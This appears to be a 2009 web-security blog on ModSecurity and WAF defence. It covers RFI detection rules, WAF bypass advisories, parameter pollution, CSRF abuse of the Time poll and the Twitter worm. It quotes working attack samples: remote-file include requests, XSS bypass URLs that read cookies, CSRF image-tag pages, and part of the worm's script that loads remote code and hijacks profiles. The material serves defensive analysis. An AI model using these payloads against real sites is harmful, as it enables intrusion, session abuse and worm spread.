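def has_ip_url(value):
    """Return True if the value contains a URL whose host starts like an IP."""
    return bool(IP_URL.search(normalize(value)))


print(has_ip_url("http://192.0.55.2/hacker.txt"))          # True
print(has_ip_url("HTTP%3A%2F%2F192.0.55.2%2Fhacker.txt"))  # True
print(has_ip_url("http://www.example.com/"))               # False
print(has_ip_url("http://1st-site.example/"))              # True
```

The last call shows a limitation worth knowing about: `[\d.]+` only requires one digit or dot, so any hostname that begins with a digit also matches.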

The PHP "include()" Function

Breach Security Labs has seen many attack vectors (from customer logs and honeypot data samples) that try to include a remote file by using the PHP "include" keyword function. A typical attack using the PHP include keyword looks like:

GET /?id={${include("http://www.malicuos_site.com/hacker.txt")}}{${exit()}} HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

A rule for detecting such a condition should search for “include(“ followed by “(ht|f)tps?:\/\/”. An example ModSecurity rule to detect this is:

SecRule ARGS "@rx \binclude\s*\([^)]*(ht|f)tps?:\/\/" \
"t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,deny,phase:2,msg:'Remote File Inclusion'"
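The include pattern can be tried out the same way in Python. As before, this is a sketch: URL decoding and lowercasing are approximated with the standard library, and the function name is an assumption for the example.

```python
import re
from urllib.parse import unquote

# Same pattern as the rule, without the escaped slashes.
INCLUDE_URL = re.compile(r"\binclude\s*\([^)]*(ht|f)tps?://")


def has_include_url(value):
    """Return True if the value calls include( ... ) with a URL argument."""
    return bool(INCLUDE_URL.search(unquote(value).lower()))


attack = '{${include("http://www.malicuos_site.com/hacker.txt")}}{${exit()}}'
print(has_include_url(attack))                                      # True
print(has_include_url("include the file from http://example.com"))  # False
print(has_include_url("please include (see http://example.com)"))   # True
```

The third call is a free-text sentence that still matches, which illustrates why a rule like this is better treated as one input to a score than as a standalone block decision.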

RFI Data Ends with a Question Mark (?)

Appending question marks to the end of the injected RFI payload is a common technique and is somewhat similar to SQL Injection payloads utilizing comment specifiers (--, ;-- or #) at the end of their payloads. The RFI attackers don't know what the remainder of the PHP code that they are going to be included into is supposed to do. So, by adding the "?" character, the remainder of the local PHP code is actually treated as a parameter to the RFI included code. The RFI code then simply ignores the legitimate code and only executes its own. A typical attack using a question mark at the end looks like:

GET /?include=http://www.malicuos_site.com/hacker.txt? HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

A rule for detecting such an attack should search for “(ft|htt)ps?.*\?+$”. An example ModSecurity rule to detect it is:

SecRule ARGS "@rx (ft|htt)ps?.*\?+$" \
"t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,deny,phase:2,msg:'Remote File Inclusion'"
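To see why the trailing question mark works, consider a hypothetical vulnerable page that appends ".php" to the user-supplied value before including it. The sketch below shows which resource would actually be requested with and without the question mark, alongside the pattern used in the rule above. The function name, the ".php" suffix and the attacker.example host are all assumptions for illustration.

```python
import re
from urllib.parse import urlsplit

# Pattern from the rule above: a URL scheme, anything, then "?" at the end.
TRAILING_QMARK_RX = re.compile(r"(ft|htt)ps?.*\?+$")


def effective_include_target(user_value: str, suffix: str = ".php") -> str:
    """Mimic a hypothetical include($_GET['include'] . '.php') and return the
    resource the remote server would be asked for (query string dropped)."""
    parts = urlsplit(user_value + suffix)
    return f"{parts.scheme}://{parts.netloc}{parts.path}"


def ends_with_question_mark(value: str) -> bool:
    """Return True when the value matches the trailing question mark pattern."""
    return TRAILING_QMARK_RX.search(value.lower()) is not None
```

With the question mark, the appended suffix lands in the query string and the attacker's file is fetched unchanged; without it, the suffix becomes part of the requested path.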

RFI Host Doesn't Match Local Host

One other technique that can be used to detect RFI attacks (when the application never legitimately references files offsite) is to inspect the domain name/hostname specified within the parameter payload and then compare it to the Host header data submitted in the request. Allowing only payloads where the two items match permits normal fully qualified referencing back to the local site while simultaneously denying offsite references. For example, the following legitimate request would be allowed as the hostnames match:

GET /path/to/app?foo=bar&filename=http://www.example.com/somefile.txt HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

A rule for detecting such an attack should initially search for “^(?:ht|f)tps?:\/\/(.*)\?$”, which also captures the hostname data within the 2nd set of parentheses. The 2nd part of this rule then compares the saved capture data with the macro expanded Host header data from the request. An example ModSecurity rule to detect it is:

SecRule ARGS "^(?:ht|f)tps?://(.*)\?$" \
"chain,phase:2,t:none,t:htmlEntityDecode,t:lowercase,capture,ctl:auditLogParts=+E,block,log,auditlog,status:501,msg:'Remote File Inclusion Attack'"
SecRule TX:1 "!@beginsWith %{request_headers.host}"
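The comparison logic can be sketched in Python as follows. This is an illustration under assumptions rather than a translation of the chained rule: `is_offsite_reference` is a hypothetical name, the port handling is simplistic (no IPv6 literals), and the sketch compares hostnames exactly where the rule uses a prefix match.

```python
from urllib.parse import urlsplit

URL_SCHEMES = ("http", "https", "ftp", "ftps")


def is_offsite_reference(param_value: str, host_header: str) -> bool:
    """Return True when the parameter is a URL that points at another host."""
    parts = urlsplit(param_value.strip().lower())
    if parts.scheme not in URL_SCHEMES:
        return False  # not a URL reference at all
    # Drop an optional port from the Host header before comparing.
    request_host = host_header.strip().lower().split(":")[0]
    return parts.hostname != request_host
```

Exact comparison is a design choice here. A prefix match would also accept a host such as www.example.com.attacker.example, since that string begins with the local hostname.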

These generic RFI rules could be used individually or collaboratively in an anomaly scoring scenario to help identify these types of attacks. Keep an eye out for a major public release of the new ModSecurity Core Rule Set (CRS) as it will include these new rules and many others.

Friday, June 5, 2009

WAF Bypass Issues: Poor Negative and Positive Security

Submitted by Ryan Barnett 6/5/2009

In my previous post I provided an overview of potential WAF identification techniques discussed in a recent OWASP AppSec conference talk. In this entry, I want to discuss the other half of their talk which highlights a few different WAF/security filter bypass issues. From their Advisory report, we find the following two main issues -

Negative Security Signature Bypass

::::: Blacklist / negative model bypass :::::
CVE: CVE-2009-1593
Description: Profense Web Application Firewall with default configuration in negative model can be evaded to inject XSS.
Technical Description:
Versions 2.4 and 2.2 of Profense Web Application Firewall with the default configuration in negative model (blacklist approach) can be evaded to inject XSS (Cross-Site Scripting). The problem is due to the built-in core rules that can be abused using the flexibility provided by HTML and JavaScript.
The vulnerability can be reproduced by injecting a common XSS attack in a vulnerable application protected by Profense Web Application Firewall. Inserting extra characters in the JavaScript close tag will bypass the XSS protection mechanisms. An example is shown below:
http://testcases/phptest/xss.php?var=%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E

As you can see from the closing script tag above (%3C/script%20ByPass%3E), inserting extra text within this tag was enough to bypass the negative signature within the WAF.

Analysis

When creating negative security regular expression filters, it is challenging to make them accurate and balance both false positives and negatives. In this particular case, it seems as though the Cross-site Scripting (XSS) signatures were a bit too specific, since the signature(s) were able to be bypassed by adding in additional text to the closing script tag. This leads me to believe that perhaps all of the XSS signatures ended with a closing script tag. XSS attacks don't always have to end with this tag for two main reasons -

Some browsers only need to see the opening script tag in order to execute the payloads, and
Many XSS vulnerabilities manifest themselves because the client supplied data is inserted into an existing script tag in the output so including it within the attack payload is not necessary.

It is for these types of reasons that many people use negative security signatures that look for smaller components of attack payloads rather than trying to describe the entire thing. For instance, in this case, what about some smaller individual regexes that looked for the opening script tag, the alert( action or the document.cookie object on their own? If you use smaller signatures, then you could still correlate matches together as part of an anomaly score and it would be more difficult for an attacker to circumvent them all.
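A minimal sketch of this "small signatures plus anomaly score" idea, applied to the bypass payload from the advisory, might look like the following. The signature set, the weights and the threshold are illustrative assumptions and are not taken from any product or rule set.

```python
import re
from urllib.parse import unquote

# Small, independent signatures with illustrative weights.
SIGNATURES = [
    ("script_open_tag", re.compile(r"<\s*script\b"), 3),
    ("alert_call", re.compile(r"\balert\s*\("), 2),
    ("document_cookie", re.compile(r"\bdocument\s*\.\s*cookie\b"), 2),
]
THRESHOLD = 5  # assumed blocking threshold


def anomaly_score(raw_value: str):
    """Return (total score, names of matched signatures) for one parameter."""
    value = unquote(raw_value).lower()
    hits = [(name, weight) for name, rx, weight in SIGNATURES if rx.search(value)]
    return sum(weight for _, weight in hits), [name for name, _ in hits]


def should_block(raw_value: str) -> bool:
    """Block only when the correlated score reaches the threshold."""
    return anomaly_score(raw_value)[0] >= THRESHOLD
```

Because none of the signatures depends on the closing script tag, the extra text inserted into that tag does not change the score, while a single weak match on its own stays below the threshold.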

While this specific advisory identified an issue with one particular WAF vendor, it could happen to any of them. Anyone who has been in the security industry for a period of time understands that negative security rules or signatures are not bulletproof and evasions are always a concern. It is somewhat like the Anti-Virus market in that users are constantly playing catchup with the bad guys' newest attack techniques. If you rely upon negative security signatures that are created specifically for known attack vectors then you are doomed to run on the Hamster Wheel of Pain where you have to update the signatures constantly.

Considering that this specific issue was a bypass/evasion of a negative security rule - I do not necessarily believe that it warranted an actual public vulnerability announcement. If public announcements for negative security filter bypasses of a security device were the norm, then we would be flooded with them for all IDS/IPS/WAF systems as they all have bypass problems. It is for this reason that you cannot rely upon negative security rules/signatures alone for protection against web application attacks. You need to also utilize positive security rules, which brings us to the 2nd part of the advisory.

Positive Security Model Bypass

::::: Whitelist / positive model bypass :::::
CVE: CVE-2009-1594
Description: 
Profense Web Application Firewall configured in positive model can be evaded.
Technical details:
Profense Web Application Firewall configured to make use of the strong positive model (white-list approach) can be evaded to launch various attacks including XSS (Cross-Site Scripting), SQL Injection, remote command execution, and others. 
The vulnerability can be reproduced by making use of a URL-encoded new line character. The pattern matching in multi line mode matches any non-hostile line and marks the whole request as legitimate, thus allowing the request. This results in a bypass in the positive model. An example is showed below:
http://testcases/phptest/xss.php?var=%3CEvil%20script%20goes%20here%3E=%0AByPass

Similar to the negative security bypass issue shown previously, the security researchers found that they could evade the positive security model profile by inserting a URL-encoded linefeed character (%0A) at the end of the attack payload and then appending a payload that actually matched the acceptable profile.

Analysis

While I somewhat downplayed the previous negative security bypass issue, I do believe that this is a serious vulnerability and it certainly does warrant a public announcement. This is a more serious issue as it isn't just a particular signature that is evaded but potentially an entire set of signatures/rules that are meant to provide better confirmation of the payload.

The underlying problem with this particular WAF application is that its Regular Expression engine was most likely configured to run in "multiline mode." Combine that configuration with a poorly constructed positive security regular expression ruleset (that is not utilizing proper beginning/end of line anchoring) and you end up with this bypass situation.

Proper construction of positive security regular expression rules is not an easy task. Remo is a GUI rules editor for ModSecurity rules and it is quite useful for manually creating these positive security rules to enforce items such as the expected character set, format or length. Here is a graphical representation of what Remo does with the data inserted by the user.

If you look and see how the data is translated into the ModSecurity rules language syntax, it is using a regular expression operator that is using beginning (^) and end of line ($) anchors to ensure that the character classes specified match against the entire payload and not just a portion of it.
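The effect of multiline mode on a positive security pattern can be reproduced with Python's `re` module. The sketch below is only an analogy for the behaviour described in the advisory; the allowed character class and the function names are assumptions, and the WAF's actual engine and rules are not known from the text.

```python
import re

ALLOWED = r"[A-Za-z0-9]+"  # assumed profile: alphanumeric characters only


def naive_positive_check(value: str) -> bool:
    # Flawed: in multiline mode ^ and $ match at every line boundary,
    # so ONE acceptable line is enough for the whole value to pass.
    return re.search(rf"^{ALLOWED}$", value, re.MULTILINE) is not None


def anchored_positive_check(value: str) -> bool:
    # fullmatch must consume the entire value, newlines included.
    return re.fullmatch(ALLOWED, value) is not None
```

`re.fullmatch` is used instead of `^...$` because, in Python, `$` also matches just before a trailing newline even without multiline mode.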

Conclusion

A few closing thoughts on this topic. First of all, this advisory shows that both negative and positive security models can have shortcomings and flaws. It is not enough to rely upon either one alone. A top tier WAF should be able to take data from both the negative security signatures and any anomalies identified from the positive security model and then correlate them together for increased intelligence and coverage. If you look at both of these examples together, these two components were clearly used in a mutually exclusive fashion. It seems that if the positive security model was used, then the negative security signatures were not evaluated. From a sheer performance perspective this might be good, but not from a security one. These two models should be used together for better coverage.

Any web security device that applies regular expression filters/signatures/rules should be reviewed to validate exactly how the regular expression engine is configured and to review the construction of the rules themselves.

Wednesday, June 3, 2009

WAF Detection with wafw00f

Submitted by Ryan Barnett 06/03/2009

Another interesting presentation that was given by Wendel Guglielmetti Henrique, Trustwave & Sandro Gauci, EnableSecurity at the recent OWASP AppSec EU conference was entitled The Truth about Web Application Firewalls: What the vendors don't want you to know. The two main topics of the talk were WAF detection and evasion.

WAF Detection

The basic premise for this topic is that inline WAFs can be detected through stimulus/response testing scenarios. Here is a short listing of possible detection methods:

Cookies - Some WAF products add their own cookie in the HTTP communication.
Server Cloaking - Altering URLs and Response Headers
Response Codes - Different error codes for hostile pages/parameters values
Drop Action - Sending a FIN/RST packet (technically could also be an IDS/IPS)
Pre Built-In Rules - Each WAF has different negative security signatures

The authors even created a tool called wafw00f to help automate these fingerprinting tasks. The tool states that it is able to identify over 20 different WAFs (including ModSecurity) so I thought I would try it out against my own ModSecurity install to see how it works. After reviewing the python source code and running a few tests, it is evident that in order for wafw00f to identify a ModSecurity installation, it is relying upon the Pre Built-In Rules category as mentioned above. Specifically, if a ModSecurity installation is using the Core Rule Set and has the SecRuleEngine On directive set, then the OS command/file access attack payloads sent by wafw00f will trigger the corresponding rules and a 501 response status code will be returned.

Reliance upon the returned HTTP status code is not a strong indicator of the existence of a WAF as this can be easily changed. Looking on the other end of the spectrum, and taking a defensive posture, this scenario reminds me somewhat of best practice steps for virtual patch creation. One of the key tenets for creating these patches is that you don't want to key off of attributes in an attack payload that are superfluous. The point is that only a small set of elements is essential to the success of the exploit. These are the items that you want to focus on for a virtual patch. If, however, you key off of non-essential data from some proof of concept code, your virtual patch can be easily evaded if the attacker alters this data. In this particular case with wafw00f, the HTTP response code generated by ModSecurity is customizable by the policies so the identification effectiveness is reduced to only "Default Configurations." With ModSecurity, for instance, it is trivial to update the status action of the Core Rule Set to use some other status code. This can be accomplished in a number of ways such as by using the block action in the rules or the SecRuleUpdateActionById directive to change what status code is returned.

This is an interesting tool in that it aids with the pentesting/assessment steps of footprinting the target network. The more details that you can identify about the target, the more finely tuned your attack strategy can be. With this in mind, if you want to easily trick wafw00f, you could always update the SecServerSignature ModSecurity directive to spoof the server response header and impersonate another WAF product :) Take a look at the wafw00f code for hints on what data to use.

Wednesday, May 27, 2009

HTTP Parameter Pollution

Submitted by Ryan Barnett 05/27/2009

How does your web application respond if it receives multiple parameters all with the same name?

If you don't know the answer to this question, you might want to find out quickly. While not a completely new attack category, webapp security researchers Stefano di Paola and Luca Carettoni certainly opened many people's eyes to the dangers of HTTP Parameter Pollution at the recent OWASP AppSec Europe conference. The main premise of the talk is actually pretty straightforward - an attacker may submit additional parameters to a web application and if these parameters have the same name as an existing parameter, the web application may react in one of the following ways -

It may only take the data from the first parameter
It may take the data from the last parameter
It may take the data from all parameters and concatenate them together

The ramification of these processing differences is that attackers may be able to distribute attack payloads across multiple parameters to evade signature-based filters. For example, the following SQL Injection attack should be caught by most negative security filters -

/index.aspx?page=select 1,2,3 from table where id=1

If, however, the attacker passes 2 parameters each called "page" with a portion of the attack payload in each, then the back-end web application may consolidate the payloads into one for processing -

/index.aspx?page=select 1&page=2,3 from table where id=1

If a negative security filter is applying a regex that looks for say a SELECT followed by a FROM to each individual parameter value then it would miss this attack. It is for this reason that some implementations will actually apply the signature check to the entire QUERY_STRING and REQUEST_BODY data strings in order to catch these types of attacks. While this may help, the unfortunate side effect is that this will most likely increase the false positive rate of other signatures.
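The difference between inspecting each parameter value on its own and inspecting what the back end may actually assemble can be sketched in Python. The regex is a deliberately simple stand-in for a real SQL Injection signature, and joining duplicate values with a comma is an assumption about the back end's consolidation behaviour; other platforms behave differently, as listed above.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Simplistic stand-in signature: SELECT followed later by FROM.
SQLI_RX = re.compile(r"\bselect\b.+\bfrom\b", re.IGNORECASE)


def per_value_hit(url: str) -> bool:
    """Apply the signature to each parameter value individually."""
    params = parse_qs(urlsplit(url).query)
    return any(SQLI_RX.search(v) for values in params.values() for v in values)


def joined_hit(url: str, joiner: str = ",") -> bool:
    """Apply the signature to duplicate values joined the way the back end
    is assumed to consolidate them."""
    params = parse_qs(urlsplit(url).query)
    return any(SQLI_RX.search(joiner.join(values)) for values in params.values())
```

Run against the two example URLs above, the per-value check catches the single-parameter attack but misses the split one, while the joined check catches both.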

The best approach to this issue is to use automated learning/profiling of the web application to identify whether multiple occurrences of a parameter are normal or not. Most web application firewalls, for instance, gather basic meta-data characteristics of parameters such as the normal size of the payloads or the expected character sets used (digits only vs. alphanumeric, etc...). The top tier WAFs, however, also track if there are multiple occurrences. If an attacker then adds in duplicate parameter names, the WAF would be able to flag this anomaly and take appropriate action.
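A simple version of the "multiple occurrences" check could look like the sketch below. The `learned_multi` set stands in for whatever a learning WAF has profiled as legitimately repeated parameters; it is a hypothetical input, as is the function name.

```python
from collections import Counter
from urllib.parse import parse_qsl, urlsplit


def duplicated_params(url: str, learned_multi=frozenset()) -> list:
    """Return parameter names that occur more than once in the query string
    and are not known (from profiling) to repeat legitimately."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    counts = Counter(name for name, _ in pairs)
    return sorted(
        name for name, count in counts.items()
        if count > 1 and name not in learned_multi
    )
```

Any name returned by this function would be a candidate for an anomaly score contribution rather than an outright block, since some applications do repeat parameters by design.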

Wednesday, May 13, 2009

Lessons Learned from Time's Most Influential Poll Abuse: Part 1

Submitted by Ryan Barnett 5/13/2009

In a textbook case of web applications being abused due to insufficient anti-automation defenses, Time Magazine's Internet poll of the most influential 100 people was bombarded with various methods to manipulate the results. The WASC Web Hacking Incident Database provides a great overview of the various tactics that Moot supporters used to influence the poll results. In this installment, we are going to focus on the CSRF attack vectors employed by Moot's supporters.

Cross-site Request Forgery (CSRF) attacks

The supporters of Moot did some analysis and identified a voting URL that the flash application submitted its data to -

http://www.timepolls.com/contentpolls/Vote.do?pollName=time100_2009&id=1883924&rating=1

They then created an auto-voting application to act as a man-in-the-middle interface to the Time poll. The auto-voter URL looked like this -

http://fun.qinip.com/gen.php?id=1883924&rating=1&amount=1

The arguments specified the ID of the person on the poll, what rating or place out of 100 the voter wanted them in and how many votes they were submitting. With this information, the attackers could abuse the amount argument to vote more than one time:

http://fun.qinip.com/gen.php?id=1883924&rating=1&amount=200

When accessing this URL, the application responds with the following message:

Down voting : 1883924 to 1 % influence 200 times per page load.

As you can see, each time this URL was accessed, it was equivalent to 200 individual normal requests.

They decided to use this URL in an automated CSRF campaign by submitting this data as a hidden SPAM link across hundreds of thousands of sites. The end result would be that when clients accessed the pages with this SPAM link on it, it would force the client to submit the Time poll CSRF data behind the scenes. The clients were therefore unknowingly voting for Moot.

Lessons Learned - Implement a CSRF Token

Time eventually identified the manipulations and attempted to implement an authentication token in the URL. The token was an MD5 hash of the URL + Salt value. While at first glance this may seem like an improvement, in fact it didn't provide much protection. The salt value was embedded inside of the flash voting application and Moot's supporters were able to extract the value and calculate the proper MD5 key value. They were then quickly able to update their CSRF URLs to include the appropriate data -

http://www.timepolls.com/hppolls/votejson.do?callback=processPoll&id=335&choice=1&key=a4f7d95082b03e99586729c5de257e7b

Lessons Learned - Implement a *good* CSRF Token

When implementing a CSRF token, it is important to make the value unique for each individual user so that it cannot be reused or easily guessed. In this case, the key token value was only factoring in the URL and the salt so the resulting hash would be the same for all users.
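The contrast between the two approaches can be sketched in Python. The first function only approximates the flawed scheme described above (the exact concatenation order Time used is an assumption), and the second is one common way to bind a token to an individual session using an HMAC. All names, the "vote" action label and the key handling are illustrative assumptions.

```python
import hashlib
import hmac
import secrets


def weak_token(url: str, salt: str) -> str:
    """Approximation of the flawed scheme: MD5 over URL + shared salt.
    Nothing user-specific goes in, so every user gets the same value."""
    return hashlib.md5((url + salt).encode()).hexdigest()


def new_session_secret() -> str:
    """Random per-session value, generated and stored server side."""
    return secrets.token_hex(32)


def strong_token(session_secret: str, action: str, server_key: bytes) -> str:
    """Token bound to one session and one action via HMAC-SHA256."""
    msg = f"{session_secret}:{action}".encode()
    return hmac.new(server_key, msg, hashlib.sha256).hexdigest()


def verify(token: str, session_secret: str, action: str, server_key: bytes) -> bool:
    """Constant-time comparison against the expected token."""
    expected = strong_token(session_secret, action, server_key)
    return hmac.compare_digest(token, expected)
```

The key point is that the secret material never ships to the client inside the application, and that a token lifted from one user's session is useless for any other session.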

There were a few other very interesting aspects to these Time poll attacks and I will cover them in future blog posts.

Identifying CSRF Attack Payloads Embedded in IMG Tags

One of the URLs used by the Moot supporters in their SPAM URL posting campaign is here -

http://fun.qinip.com/

If you inspect the source of the page, you will see the following -

<html>
<head>
</head>
<body>
<img src="http://www.timepolls.com/hppolls/votejson.do?callback=processPoll&id=335&choice=1&key=a4f7d95082b03e99586729c5de257e7b" /><img src="http://www.timepolls.com/hppolls/votejson.do?callback=processPoll&id=335&choice=1&key=a4f7d95082b03e99586729c5de257e7b" />
...
</body>
</html>

This technique of CSRF uses the IMG html tag to trick the browser into submitting the attack payload. What is interesting with the technique, from a detection perspective, is that when some browsers make this request, the Accept request header tells the web server that it is expecting an image file. For example, Firefox sends this request -

GET /hppolls/votejson.do?callback=processPoll&id=335&choice=1&key=a4f7d95082b03e99586729c5de257e7b HTTP/1.1
Host: www.timepolls.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://fun.qinip.com/

This information could be used in an anomaly scoring scenario to help to identify these types of basic CSRF injections. Proper acknowledgement of identifying this phenomenon goes to Rsnake as we discussed this concept at a previous SANS conference. These types of detection "golden nuggets" are part of Rsnake's upcoming security book entitled "Detecting Malice" which is scheduled for release later this summer by FeistyDuck publishing (www.feistyduck.com).
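As a rough illustration of how this Accept header observation could feed an anomaly score, consider the sketch below. The function names, the weight and the idea of keeping a set of state-changing paths are assumptions for the example. Not every browser sends an image-first Accept header for IMG requests, so this is a weak signal that should only add to a score.

```python
def accept_prefers_images(accept_header: str) -> bool:
    """Return True when the first media type in Accept is an image type."""
    first = accept_header.split(",")[0].split(";")[0].strip().lower()
    return first.startswith("image/")


def img_tag_csrf_score(path: str, accept_header: str,
                       state_changing_paths: set, weight: int = 2) -> int:
    """Add to the anomaly score when a state-changing, non-image resource
    is requested by a client that says it expects an image."""
    if path in state_changing_paths and accept_prefers_images(accept_header):
        return weight
    return 0
```

For the Firefox request shown above, the vote URL would score because the client announces image/png first while asking for a resource that records a vote.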

Tuesday, May 5, 2009

Newebappitis

Submitted by Ryan Barnett 05/05/2009

The webappsec space has often been compared to the early years of the automobile industry. This was the time before safety mechanisms such as seatbelts, airbags, etc... were mandated by governing bodies. Experts rightfully point out that today's web applications are much like the cars of yesteryear in that the focus is on features and not on the safety of the users. While I could go on and on with many comparative aspects between the auto industry and webappsec, I want to focus this blog post on one point in particular: the interesting phenomenon called Newcaritis. Take a look at the advertisement by Porsche for the Boxster. The text box reads:

“Newcaritis”. That’s a technical term for the unanticipated problems that show up in early production cars. No matter how large the automaker, how vaunted its reputation, how extensive its pre-production testing program or how clever it’s engineering staff, there’s nothing like putting several thousand cars in the devilish little hands of the public to uncover bugs that the engineers never dreamed of.

For those of you who have been in charge of either assessing or protecting production web applications, this definition must sound very familiar. It seems as though newly developed and deployed web applications suffer from Newebappitis! The issues are the same - even though organizations attempt to run thorough testing phases, there is just no practical way to duplicate all of the possible ways in which real clients will interact with it once it is in production. The point is that you must have mechanisms in place to identify if/when your clients and web application are acting abnormally. Web application firewalls excel at detecting when clients are submitting data that is outside the expected profile and when web applications respond in an abnormal manner such as returning detailed error messages.

Monday, April 27, 2009

Scanner and WAF Data Sharing

Submitted by Ryan Barnett 04/27/2009

The concept of a web application vulnerability scanner exporting data that is then imported into a web application firewall (WAF) for targeted remediation is not new. In a previous post, I outlined one example of this VA -> WAF data sharing concept where the Whitehat Sentinel service will auto-generate ModSecurity virtual patching rules for specific identified issues. While this concept is certainly attractive to show risk reduction, it is important to realize that you are not constrained to a "one way" data flow. WAFs have access to a tremendous amount of information that they can share with vulnerability scanners in order to make them more effective. VA + WAF should ideally be a symbiotic relationship. Here are a few examples:

When to scan?
Have you ever asked a vulnerability scanning team what their rationale was for their scanning schedule? If not, you might want to do this as the responses may be either illuminating or absolutely frustrating. Unfortunately, most scanning schedules are driven by arbitrary dates to meet minimum requirements (such as quarterly scanning which is mandated by some parent organization). Most scanning is scheduled when it is convenient for the scanning team and is not tailored around any actual intelligence about the target application. Ideally, scanning schedules should be driven by the organization's Change Control processes.

The issue seems to be that most scanning initially leverages the change control process when it is run as a security gate for production when an application is initially being deployed. Then, for some reason, it is set to some arbitrary "time interval" moving forward (once per week, etc...). This scanning is conducted whether or not anything has actually changed within the application. Why is this happening? When discussing this issue with scanning personnel, the overwhelming response is that they scan at set intervals due to a lack of visibility into when an application has actually changed. There is no coordination between the InfoSec/Ops teams to initiate scanning processes when the app changes so they are left with scanning at short intervals in order to be safe.

So, knowing "when to scan" is important. A WAF has a unique positional view of the web application as it is up 24x7 monitoring the traffic. This is in contrast to scanners, which take snapshot views of the application when they run. Top tier WAFs are able to profile the web application and identify when the application legitimately changes. In these scenarios, it is a simple matter of setting the appropriate policy actions in order to send out emails to notify the vulnerability scanning staff to immediately initiate a new scan.

What to scan?
It is a somewhat similar scenario to the one mentioned above. Try asking the vulnerability scanning team about their rationale for how they choose "what" to scan. Again, the overwhelming response to this is that they enumerate and scan everything because they have no insight into what has changed in the target application. Understand that there may be reasons for scanning even when the application hasn't changed (such as when a new vulnerability identification check has been created) however this tactic normally results in needless scanning of resources that have not changed.

Similar to the capability outlined in the previous section, not only can a good WAF alert you when an application has changed, but it can also outline exactly which resources have changed. Imagine for a moment that you are in charge of running the scanning processes and you were able to get an email as soon as a new web resource was deployed or updated, outlining exactly which resources needed to be scanned. That would not only shorten the time to identify a vuln, but it would also significantly reduce the overall scanning time by making the scan more targeted.

Scanning Coverage
Another challenge for scanning tools is that of application coverage. Here is another question to ask your vulnerability scanning team - What percentage of the web application do you enumerate during your scans? Answering this question is tricky as it is extremely difficult to accurately gauge a percentage given scanning challenges and the dynamic nature of web applications. The bottom line is that if the scanner cannot effectively spider/crawl/index all of the resources, then it obviously can't conduct vulnerability analysis on them.

The issue of application coverage is another area where WAFs can help scanners. Top WAFs are able to export their learned SITE tree so that it may be used by scanning teams to reconcile the resources. This results not only in greater coverage but, once again, can reduce the overall scanning time as the crawling phase may be significantly shortened and in some cases excluded altogether.
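The two data-sharing ideas discussed above (telling the scanner which resources changed, and reconciling the crawl against the WAF's learned site tree) could be sketched as follows. The input formats are assumptions: a WAF export is imagined as a mapping of resource path to some profile fingerprint, and the scanner's crawl as a set of paths. No particular product's export format is implied.

```python
def resources_to_scan(previous: dict, current: dict) -> list:
    """Return resources that are new, or whose learned profile fingerprint
    differs from the previous snapshot."""
    return sorted(
        path for path, fingerprint in current.items()
        if previous.get(path) != fingerprint
    )


def crawl_coverage(waf_site_tree: set, crawled: set):
    """Return (percent of WAF-known resources the scanner reached,
    sorted list of resources the scanner missed)."""
    missed = sorted(waf_site_tree - crawled)
    if not waf_site_tree:
        return 100.0, missed
    percent = 100.0 * len(waf_site_tree & crawled) / len(waf_site_tree)
    return percent, missed
```

The first function gives the scanning team a targeted work list after a change, and the second gives a concrete answer to the coverage question along with the resources to seed into the next crawl.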

Data sharing between vulnerability scanners and web application firewalls is vitally important for web application remediation efforts. Hopefully this post has helped to demonstrate how the information passing between these tools/processes is not just one-way but is bi-directional. Each one has its own unique perspective on the target application and can provide data to the other that it couldn't necessarily obtain on its own. I believe that the integration of VA+WAF is only going to increase as we move forward.

Monday, April 13, 2009

Twitter Worm - Cross-site Request Forgery Attacks

Submitted by Ryan Barnett 04/13/2009

In case you were too busy hunting for Easter Eggs this past weekend, you may have missed the fact that Twitter was hit with Cross-site Request Forgery worm attacks. Many news outlets are labeling these as Cross-site Scripting attacks, which is true; however, Cross-site Request Forgery is more accurate. Let's look at these definitions:

Cross-site Scripting "occurs whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc." This definition does hold true for the Twitter worms as the malicious payload was sent to users' browsers where it would execute.

Cross-site Request Forgery "attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks." This definition is more accurate as the malicious javascript payload is forcing a logged in Twitter user to update their profile to include the worm javascript. The fact that the javascript code is leveraging the user's session token data to send an unintentional request back to the application is the essence of a CSRF attack.

In my previous post I mentioned how it was difficult to neatly place attacks into just one category. Was this an XSS attack or a CSRF attack? In actuality it was both. These worm attacks leveraged a lack of proper output encoding to launch an XSS attack, however the payload itself was CSRF.

The attacks targeted Twitter users' "profile" component and injected javascript similar to the following:

<a href="http://www.stalkdaily.com"/><script src="hxxp://mikeyylolz.uuuq.com/x.js">

The "<script>" data is what was getting injected into people’s profiles. Taking a quick look at the "x.js" script, we see the following:

var update = urlencode("Hey everyone, join www.StalkDaily.com. It’s a site like Twitter but with pictures, videos, and so much more! :)");
var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');
var ajaxConn = new XHConn();
ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+update+"&tab=home&update=update");
ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");

